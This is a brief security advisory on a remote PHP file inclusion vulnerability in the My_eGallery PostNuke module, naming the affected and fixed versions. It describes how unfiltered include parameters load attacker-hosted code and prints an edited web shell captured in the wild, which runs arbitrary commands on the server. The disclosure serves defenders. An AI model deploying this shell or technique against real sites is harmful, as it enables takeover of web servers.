My_eGallery is "a very nice PostNuke module, which allows users to create and manipulate their own galleries on the web, plus offers various additional features". A vulnerability in the product allows remote attackers to inject code and cause it to execute under the privilieges My_eGallery runs under.
Credit:
The information has been provided by Bojan Zdrnja.
Vulnerable systems:
* My_eGallery version 3.1.1.f and prior
Immune systems:
* My_eGallery version 3.1.1.g
Certain PHP files have some parameters which are used in include functions not filtered. An intruder can craft PHP code on their Web site and supply parameter to My_eGallery so it actually includes malicious PHP code.
The following code was captured as being used in the wild (edited intentionally): <?
// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
if (isset($chdir)) @chdir($chdir);
ob_start();
execute("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
print_output();
?>
This allows execution of any command on the server with My_eGallery, under the privileges of the Web server (usually apache or httpd).
